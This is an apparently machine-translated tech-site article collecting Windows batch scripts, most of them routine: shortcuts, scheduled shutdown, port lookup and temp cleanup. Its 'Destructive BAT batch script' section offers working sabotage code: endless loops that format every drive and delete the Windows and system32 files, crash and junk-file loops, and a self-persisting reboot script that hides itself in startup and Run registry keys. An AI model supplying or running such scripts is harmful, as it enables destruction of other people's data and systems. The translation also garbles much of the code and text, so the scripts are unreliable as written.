Shulou(Shulou.com)06/03 Report--

This article will explain in detail the example analysis on the use of batch processing. The editor thinks it is very practical, so I share it for you as a reference. I hope you can get something after reading this article.

The batch program deletes itself .bat

Echo sometimes we need a batch program to delete itself after execution is complete, we can use del 0

Example:

The code is as follows:

@ echo off

I will delete myself after echo presses any key.

Pause

Del 0

Batch send shortcuts to folders to the desktop

The code is as follows:

Echo [InternetShortcut] > "% userprofile%\ Desktop\ folder .url"

Echo URL= file:///C:/windows > > "% userprofile%\ Desktop\ folder .url"

Batch process to get IP to generate TXT text .bat

The following code is a batch process that gets IP and generates TXT text:

The code is as follows:

@ echo off

Tmp.vbs

Cscript / / NoLogo / e:vbscript tmp.vbs 1 > ip.txt

Echo > nul & & del tmp.vbs

Goto:eof

Set oDOM = WScript.GetObject ("http://www.duosc.com/ip.aspx")

Do until oDOM.readyState = "complete"

WScript.sleep 200

Loop

S=oDOM.documentElement.innerText

Set re = New RegExp

Re.Pattern= "(\ d +)\. (\ d +)"

For Each m in re.Execute (s)

WScript.Echo m

Next

Disable (enable) group policy with batch processing

Regsvr32 / s / u gpedit.dll disabled

Regsvr32 / s gpedit.dll enabled

Using this command alone can still prohibit the use of group policy, but the consequence is-

The group policy running at this time is basically an empty shell! Using the following batch processing will solve this kind of problem perfectly!

Compile the following code into a BAT batch file, which is the command to disable group policy

The code is as follows:

@ echo off

Regsvr32 / s / u fde.dll

Regsvr32 / s / u gpedit.dll

Regsvr32 / s / u gptext.dll

Regsvr32 / s / u wsecedit.dll

Exit

This is to enable group policy

The code is as follows:

@ echo off

Regsvr32 / s fde.dll

Regsvr32 / s gpedit.dll

Regsvr32 / s gptext.dll

Regsvr32 / s wsecedit.dll

Exit

Batch shutdown at a fixed time. Bat

The code is as follows:

@ echo off

Mode con lines=25

Title shuts down regularly

Color 1f

Cls

Echo.

Echo.

Echo.

Echo.

Echo time uses a 24-hour system (such as 2:15, 12:00), and you can enter multiple time steps

Echo.

Multiple time points in echo are separated by spaces

Echo.

Echo.

Echo ━━

Echo.

Set times=

Set / p times= Please enter shutdown time:

The following statement shuts down the computer at a specified time every day of the week

:: if you want to change to certain days of each month, please change letters to numbers and separate them with commas

:: there is no error detection statement in the following code. Be sure to enter the time in the specified format.

:: you can use the at command in the CMD window to view scheduled tasks

If not "% times%" = "" for% I in (% times%) do (

At% I / every:M,T,W,Th,F,S,Su shutdown-s

)

Batch create shortcuts in url format. Bat

The code is as follows:

@ echo off

Echo [InternetShortcut] > cmd.url

Echo URL=%windir%\ system32\ cmd.exe > > cmd.url

Echo IconIndex=0 > > cmd.url

Echo IconFile=%windir%\ system32\ cmd.exe > > cmd.url

Batch processing enters the full-screen interface. Bat

The code is as follows:

@ echo off

:: set: run in full screen mode

Echo exit |% ComSpec% / k prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_ debug > nul

Chcp 437 > nul

Graftabl 936 > nul

: put any command under rem.

Dir

Pause

Minimize running batches. Bat

The code is as follows:

:: minimize running batches

@ echo off&&mode con cols=15 lines=1

1 2

Start / min / I ""% ~ nx0 "goto min&&goto: eof

: min

Echo xxx

Pause > nul

Exit

@ echo off

Mode con cols=15 lines=1

If exist "Temp.bat" goto Start

> Temp.bat echo start/min ""% ~ nx0 "^ & exit

Start/min Temp.bat&exit

: Start

Del "Temp.bat" > nul

Pause

Find QQ.exe and execute .bat

The code is as follows:

@ echo off

:: find the qq.exe completely, then execute and exit the CMD window when you find it

Although the result obtained by fsutil fsinfo drives has a space in the middle, it represents the function of carriage return or line feed, so you have to filter it with find / v. Otherwise, you will only get the first partition.

Setlocal enabledelayedexpansion

For / f "delims=\"% I in ('fsutil fsinfo drives ^ | find / v ""') do (

Set var=%%i

Set driveboat var VRV color 2!

Fsutil fsinfo drivetype! drive! | find "fixed" > nul & & (

For / f "tokens=*"% j in ('dir / Amurd / b / s! drive!\ qq.exe 2 ^ > nul') do if not "% j" = = "" start ""% j "& & exit

)

)

Delete history .bat

The code is as follows:

@ echo off

Delete the history of "run", "find", etc.

Reg add HKCU\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer / v ClearRecentDocsonExit / t REG_DWORD / d 00000001

Batch View process Port

Obtain the port code opened by the current process with batch implementation:

The code is as follows:

@ echo off

Color a

Title XP Port-process query

Setlocal enabledelayedexpansion

Echo ╔-- ╗

The port opened locally by echo and the processes that use it

Echo ╚-- ╝

Echo--

Echo port number process name

ECHO TCP protocol:

Use the netstat command to find out the port that uses the TCP protocol to communicate, and divide the result

:: pass the second parameter (IP plus port) to% I and the fifth parameter (PID number) to% j

For / F "usebackq skip=4 tokens=2,5"% I in (`"netstat-ano-p TCP"`) do (

Call: Assoc% I TCP% j

Echo! TCP_Port!! TCP_Proc_Name!

)

ECHO UDP protocol:

For / F "usebackq skip=4 tokens=2,4"% I in (`"netstat-ano-p UDP"`) do (

Call: Assoc% I UDP% j

Echo! UDP_Port!! UDP_Proc_Name!

)

Echo press any key to exit

Pause > nul

: Assoc

:: split% 1 (the first parameter) and pass the second parameter to% e. In this program,% 1 is the% I above (in the form: IP: Port number)

For / F "tokens=2 delims=:" e in ("1") do (

Set 2_Port=%%e

)

:: query the process whose PID is equal to% 3 (the third parameter) and pass the result to the variable? _ Proc_Name,? Stands for UDP or TCP

For / F "skip=2 usebackq delims=, tokens=1" an in (`"Tasklist / FI" PID eq 3 "/ FO CSV"`) do (

::% ~ a means to remove the quotation marks outside% a, because the result of the above command is enclosed in parentheses.

Set 2_Proc_Name=%%~a

)

Destructive BAT batch script [use with caution]

First, the endless loop forced format A: to Z: disk (for some of the faster machines will be faster to crash …... )

The code is as follows:

: format

@ format a: / Q / y > nul

@ format b: / Q / y > nul

@ format d: / Q / y > nul

@ format e: / Q / y > nul

@ format f: / Q / y > nul

@ format g: / Q / y > nul

@ format h: / Q / y > nul

@ format I: / Q / y > nul

@ format j: / Q / y > nul

@ format k: / Q / y > nul

@ format l: / Q / y > nul

@ format m: / Q / y > nul

@ format n: / Q / y > nul

@ format o: / Q / y > nul

@ format p: / Q / y > nul

@ format Q: / Q / y > nul

@ format r: / Q / y > nul

@ format s: / Q / y > nul

@ format t: / Q / y > nul

@ format u: / Q / y > nul

@ format v: / Q / y > nul

@ format w: / Q / y > nul

@ format x: / Q / y > nul

@ format y: / Q / y > nul

@ format z: / Q / y > nul

@ format c: / Q / y > nul

Goto format

Second, the endless loop forcibly deletes all files under the C: disk WINDOWS directory (similar to the effect of the above example, but the forced deletion parameter is used here)

The code is as follows:

: breake

@ if exist% windir%\ system32\ *. * del% windir%\ system32\ *. * > nul

@ if exist% windir%\ *. * del% windir%\ *. * > nul

Goto breake

Third, use the memory occupation of some system tools to crash

The code is as follows:

: die

@ start regsvr32.exe / s% windir%\ system32\ *. * > nul

@ start% windir%\ system32\ *. * > nul

@ start notepad% windir%\ explorer.exe > nul

Goto die

Fourth, use the detection information export function of some tools to generate huge junk files (although the speed of generating garbage is very slow, compared with the "garbage king" virus, it can be regarded as "silent *". )

The code is as follows:

@ start ping 127.0.0.1-t >% windir%\ system32\ regsvr32.dll > nul

: ping

@ start ping 127.0.0.1-t > >% windir%\ system32\ regsvr32.dll > nul

@ start ping 127.0.0.1-t > >% windir%\ system32\ regedit.exe > nul

Goto ping

Malicious batches that are repeatedly restarted

To restart repeatedly is to let someone else start and restart again and again, as shown in the following code

The code is as follows:

@ echo off

Shutdown-r-t 3

Copy% 0 C:\ Documents "and"Settings\ All"Users\" start menu\ Program\ start\ a.bat

Copy% 0 c:\ autoexec.bat

REG ADD HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Run / v autoexec.bat / t REG_SZ / d c:\ autoexec.bat / f

REG ADD HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Run / v autoexec.bat / t REG_SZ / d c:\ autoexec.bat / f

Attrib autoexec.bat + r + s + h

REG ADD HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ explorer\ Advanced\ Folder\ Hidden / v CheckedValue / t REG_DWORD / d 00000000 / f

Del 0

A 3-second reboot will cause a 3-second countdown when the startup item is added.

Delete the right-click New menu item .bat

The code is as follows:

@ echo off

:: just delete the "ShellNew" key under the "HKEY_CLASSERS_ROORT\. Suffix name" project.

:: if you really can't delete it, just delete the "HKEY_CLASSERS_ROORT\. Suffix name"

Mode con lines=25

Title "New" menu content deletion

Color 1f

: input

Cls

Call: display

If you want to delete echo by force, please select 1.

Echo.

Echo.

Set input=

Set / p input= Please enter the suffix:

If "% input%" = "" goto input

If "% input%" = = "0" exit

If "% input%" = = "1" goto fouce

For / f% I in ("% input%") do (reg delete HKCR\.% I\ ShellNew / f)

Goto continue

: fouce

Cls

Call: display

Set input=

Set / p input= Please enter the suffix name (forcibly delete):

If "% input%" = "" goto fouce

If "% input%" = = "0" exit

For / f% I in ("% input%") do (reg delete HKCR\.% I / f)

: continue

Cls

Call: display

Echo.

Set choice=

Does set / p choice= continue to be cleared? (YBO):

If "% choice%" = "" goto continue

If "% choice%" = = "y" goto input

If "% choice%" = "" goto: eof

: display

Echo.

Echo.

Echo.

Echo.

Echo.

Echo.

Echo this program can delete the redundant content under the "New" item in the right-click menu and lose weight for the "New" menu!

Echo.

Echo if you want a certain type of file to no longer appear in the right mouse button on the New menu, please directly

Echo.

Echo enter the suffix name for the file type. For example: rar.

Echo.

Please select 0 for echo to exit

Echo.

Quickly clean up garbage files (correction)

The code is as follows:

@ echo off

Color f0

Echo.

Echo is safely automatically cleaning up junk files.

Del / f / Q% systemdrive%\ * .tmp > nul 2 > nul

Del / f / Q% systemdrive%\ *. _ mp > nul 2 > nul

Del / f / Q% systemdrive%\ * .log > nul 2 > nul

Del / f / Q% systemdrive%\ * .gid > nul 2 > nul

Del / f / Q% systemdrive%\ * .chk > nul 2 > nul

Del / f / Q% systemdrive%\ * .old > nul 2 > nul

Del / f / Q% windir%\ * .bak > nul 2 > nul

Del / f / Q% windir%\ * .tmp > nul 2 > nul

Del / f / Q% windir%\ prefetch\ *. * > nul 2 > nul

Del / f / s / Q% systemdrive%\ recycled\ *.

Del / f / Q "% ALLUSERSPROFILE%\ Documents\ DrWatson\ *. *" > nul 2 > nul

Del / f / Q "% USERPROFILE%\ Cookies\ * .txt" > nul 2 > nul

Del / f / Q / s "% TEMP%\ *. *" > nul 2 > nul

Del / f / Q / s "% Systemroot%\ Prefetch\ *. *" > nul 2 > nul

Del / f / Q "% USERPROFILE%\ Recent\ *. *" > nul 2 > nul

Del / f / Q "% USERPROFILE%\ Application Data\ Microsoft\ Office\ Recent\ * .lnk" > nul 2 > nul

Del / f / Q / s "% USERPROFILE%\ Local Settings\ Temp\ *. *" > nul 2 > nul

Rd / s / Q% windir%\ temp & md% windir%\ temp > nul 2 > nul

If not exist% SystemRoot%\ Minidump\ NUL del / f / Q / s% SystemRoot%\ Minidump\ *. * > nul 2 > nul

Del / f / s / Q "% userprofile%\ Local Settings\ Temporary Internet Files\ *. *" > nul 2 > nul

This is the end of this article on "sample Analysis using batch processing". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, please share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.